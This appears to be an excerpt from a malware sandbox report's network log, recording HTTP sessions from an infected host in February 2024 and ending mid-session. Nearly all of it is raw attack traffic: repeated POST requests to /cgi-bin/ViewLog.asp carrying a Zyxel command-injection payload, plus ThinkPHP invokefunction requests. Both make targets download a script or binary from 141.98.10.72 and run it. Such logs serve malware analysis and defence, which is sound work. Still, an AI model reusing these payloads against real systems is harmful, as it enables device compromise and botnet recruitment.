                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                            Feb 14, 2024 09:29:03.418510914 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                            Feb 14, 2024 09:29:26.199426889 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                            Feb 14, 2024 09:30:09.201314926 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            387192.168.2.2334822124.220.204.8523
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:28:42.512847900 CET165INHTTP/1.0 200 OK
                                                            Server: Proxy
                                                            Data Raw: 55 6e 61 75 74 68 6f 72 69 7a 65 64 20 2e 2e 2e 0d 0a 49 50 20 41 64 64 72 65 73 73 3a 20 38 31 2e 31 38 31 2e 35 37 2e 37 34 0d 0a 4d 41 43 20 41 64 64 72 65 73 73 3a 20 0d 0a 53 65 72 76 65 72 20 54 69 6d 65 3a 20 32 30 32 34 2d 30 32 2d 31 34 20 31 36 3a 32 38 3a 34 32 0d 0a 41 75 74 68 20 52 65 73 75 6c 74 3a 20 49 6e 76 61 6c 69 64 20 75 73 65 72 2e
                                                            Data Ascii: Unauthorized ...IP Address: 81.181.57.74MAC Address: Server Time: 2024-02-14 16:28:42Auth Result: Invalid user.


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            388192.168.2.233817494.44.130.648080
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:28:42.606178045 CET326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                            Feb 14, 2024 09:28:43.766768932 CET326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                            Feb 14, 2024 09:28:44.368985891 CET83INHTTP/1.1 404 Not Found
                                                            Connection: close
                                                            Transfer-Encoding: chunked


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            389192.168.2.2334848124.220.204.8523
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:28:43.160419941 CET165INHTTP/1.0 200 OK
                                                            Server: Proxy
                                                            Data Raw: 55 6e 61 75 74 68 6f 72 69 7a 65 64 20 2e 2e 2e 0d 0a 49 50 20 41 64 64 72 65 73 73 3a 20 38 31 2e 31 38 31 2e 35 37 2e 37 34 0d 0a 4d 41 43 20 41 64 64 72 65 73 73 3a 20 0d 0a 53 65 72 76 65 72 20 54 69 6d 65 3a 20 32 30 32 34 2d 30 32 2d 31 34 20 31 36 3a 32 38 3a 34 32 0d 0a 41 75 74 68 20 52 65 73 75 6c 74 3a 20 49 6e 76 61 6c 69 64 20 75 73 65 72 2e
                                                            Data Ascii: Unauthorized ...IP Address: 81.181.57.74MAC Address: Server Time: 2024-02-14 16:28:42Auth Result: Invalid user.


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            390192.168.2.234319031.136.29.1998080
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:28:43.245182037 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                            Feb 14, 2024 09:28:43.933398008 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                            Feb 14, 2024 09:28:45.277189970 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                            Feb 14, 2024 09:28:48.060643911 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                            Feb 14, 2024 09:28:53.435966015 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                            Feb 14, 2024 09:29:04.186527014 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                            Feb 14, 2024 09:29:26.199321985 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                            Feb 14, 2024 09:30:09.201407909 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            391192.168.2.233734485.253.71.1958080
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:28:43.254486084 CET326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            392192.168.2.235514294.123.89.28080
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:28:43.272958040 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            393192.168.2.235445294.110.56.958080
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:28:43.298707008 CET326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            394192.168.2.2334866124.220.204.8523
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:28:43.793061972 CET165INHTTP/1.0 200 OK
                                                            Server: Proxy
                                                            Data Raw: 55 6e 61 75 74 68 6f 72 69 7a 65 64 20 2e 2e 2e 0d 0a 49 50 20 41 64 64 72 65 73 73 3a 20 38 31 2e 31 38 31 2e 35 37 2e 37 34 0d 0a 4d 41 43 20 41 64 64 72 65 73 73 3a 20 0d 0a 53 65 72 76 65 72 20 54 69 6d 65 3a 20 32 30 32 34 2d 30 32 2d 31 34 20 31 36 3a 32 38 3a 34 33 0d 0a 41 75 74 68 20 52 65 73 75 6c 74 3a 20 49 6e 76 61 6c 69 64 20 75 73 65 72 2e
                                                            Data Ascii: Unauthorized ...IP Address: 81.181.57.74MAC Address: Server Time: 2024-02-14 16:28:43Auth Result: Invalid user.


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            395192.168.2.2334876124.220.204.8523
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:28:44.446882010 CET165INHTTP/1.0 200 OK
                                                            Server: Proxy
                                                            Data Raw: 55 6e 61 75 74 68 6f 72 69 7a 65 64 20 2e 2e 2e 0d 0a 49 50 20 41 64 64 72 65 73 73 3a 20 38 31 2e 31 38 31 2e 35 37 2e 37 34 0d 0a 4d 41 43 20 41 64 64 72 65 73 73 3a 20 0d 0a 53 65 72 76 65 72 20 54 69 6d 65 3a 20 32 30 32 34 2d 30 32 2d 31 34 20 31 36 3a 32 38 3a 34 34 0d 0a 41 75 74 68 20 52 65 73 75 6c 74 3a 20 49 6e 76 61 6c 69 64 20 75 73 65 72 2e
                                                            Data Ascii: Unauthorized ...IP Address: 81.181.57.74MAC Address: Server Time: 2024-02-14 16:28:44Auth Result: Invalid user.


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            396192.168.2.234864095.217.70.2180
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:28:44.449415922 CET331OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: /
                                                            User-Agent: Uirusu/2.0
                                                            Feb 14, 2024 09:28:44.674405098 CET515INHTTP/1.1 400 Bad Request
                                                            Date: Wed, 14 Feb 2024 08:27:41 GMT
                                                            Server: Apache/2.4.38 (Univention)
                                                            Content-Length: 317
                                                            Connection: close
                                                            Content-Type: text/html; charset=iso-8859-1
                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 72 20 62 72 6f 77 73 65 72 20 73 65 6e 74 20 61 20 72 65 71 75 65 73 74 20 74 68 61 74 20 74 68 69 73 20 73 65 72 76 65 72 20 63 6f 75 6c 64 20 6e 6f 74 20 75 6e 64 65 72 73 74 61 6e 64 2e 3c 62 72 20 2f 3e 0a 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 33 38 20 28 55 6e 69 76 65 6e 74 69 6f 6e 29 20 53 65 72 76 65 72 20 61 74 20 70 6f 72 74 61 6c 2e 61 77 61 6e 64 67 61 72 64 65 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                            Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>400 Bad Request</title></head><body><h1>Bad Request</h1><p>Your browser sent a request that this server could not understand.<br /></p><hr><address>Apache/2.4.38 (Univention) Server at portal.awandgarde.com Port 80</address></body></html>


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            397192.168.2.2334884124.220.204.8523
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:28:45.078402042 CET165INHTTP/1.0 200 OK
                                                            Server: Proxy
                                                            Data Raw: 55 6e 61 75 74 68 6f 72 69 7a 65 64 20 2e 2e 2e 0d 0a 49 50 20 41 64 64 72 65 73 73 3a 20 38 31 2e 31 38 31 2e 35 37 2e 37 34 0d 0a 4d 41 43 20 41 64 64 72 65 73 73 3a 20 0d 0a 53 65 72 76 65 72 20 54 69 6d 65 3a 20 32 30 32 34 2d 30 32 2d 31 34 20 31 36 3a 32 38 3a 34 34 0d 0a 41 75 74 68 20 52 65 73 75 6c 74 3a 20 49 6e 76 61 6c 69 64 20 75 73 65 72 2e
                                                            Data Ascii: Unauthorized ...IP Address: 81.181.57.74MAC Address: Server Time: 2024-02-14 16:28:44Auth Result: Invalid user.


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            398192.168.2.234056895.124.249.24980
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:28:45.322585106 CET331OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: /
                                                            User-Agent: Uirusu/2.0
                                                            Feb 14, 2024 09:28:48.317513943 CET49INHTTP/1.1 404 Site or Page Not Found
                                                            Feb 14, 2024 09:28:48.613058090 CET473INData Raw: 41 63 63 65 73 73 2d 43 6f 6e 74 72 6f 6c 2d 41 6c 6c 6f 77 2d 4f 72 69 67 69 6e 3a 20 2a 0d 0a 41 63 63 65 73 73 2d 43 6f 6e 74 72 6f 6c 2d 41 6c 6c 6f 77 2d 43 72 65 64 65 6e 74 69 61 6c 73 3a 20 74 72 75 65 0d 0a 53 65 72 76 65 72 3a 20 65 57
                                                            Data Ascii: Access-Control-Allow-Origin: *Access-Control-Allow-Credentials: trueServer: eWONDate: Wed Feb 14 10:30:27 2024 GMTConnection: closePragma: no-cacheCache-Control: no-cache,max-age=0,must-revalidateContent-Type: text/html<html>


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            399192.168.2.2334894124.220.204.8523
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:28:45.715738058 CET165INHTTP/1.0 200 OK
                                                            Server: Proxy
                                                            Data Raw: 55 6e 61 75 74 68 6f 72 69 7a 65 64 20 2e 2e 2e 0d 0a 49 50 20 41 64 64 72 65 73 73 3a 20 38 31 2e 31 38 31 2e 35 37 2e 37 34 0d 0a 4d 41 43 20 41 64 64 72 65 73 73 3a 20 0d 0a 53 65 72 76 65 72 20 54 69 6d 65 3a 20 32 30 32 34 2d 30 32 2d 31 34 20 31 36 3a 32 38 3a 34 35 0d 0a 41 75 74 68 20 52 65 73 75 6c 74 3a 20 49 6e 76 61 6c 69 64 20 75 73 65 72 2e
                                                            Data Ascii: Unauthorized ...IP Address: 81.181.57.74MAC Address: Server Time: 2024-02-14 16:28:45Auth Result: Invalid user.


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            400192.168.2.235251485.194.33.238080
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:28:45.819204092 CET326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            401192.168.2.235823031.172.67.2448080
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:28:45.838815928 CET326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                            Feb 14, 2024 09:28:46.081743002 CET451INHTTP/1.1 400 Bad Request
                                                            Date: Wed, 14 Feb 2024 08:28:45 GMT
                                                            Server: Apache/2.4.48 (Ubuntu) mod_fcgid/2.3.9 OpenSSL/1.1.1f
                                                            Content-Length: 226
                                                            Connection: close
                                                            Content-Type: text/html; charset=iso-8859-1
                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 72 20 62 72 6f 77 73 65 72 20 73 65 6e 74 20 61 20 72 65 71 75 65 73 74 20 74 68 61 74 20 74 68 69 73 20 73 65 72 76 65 72 20 63 6f 75 6c 64 20 6e 6f 74 20 75 6e 64 65 72 73 74 61 6e 64 2e 3c 62 72 20 2f 3e 0a 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                            Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>400 Bad Request</title></head><body><h1>Bad Request</h1><p>Your browser sent a request that this server could not understand.<br /></p></body></html>


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            402192.168.2.236078894.121.117.1948080
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:28:45.852044106 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            403192.168.2.235566431.200.92.1578080
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:28:45.853571892 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
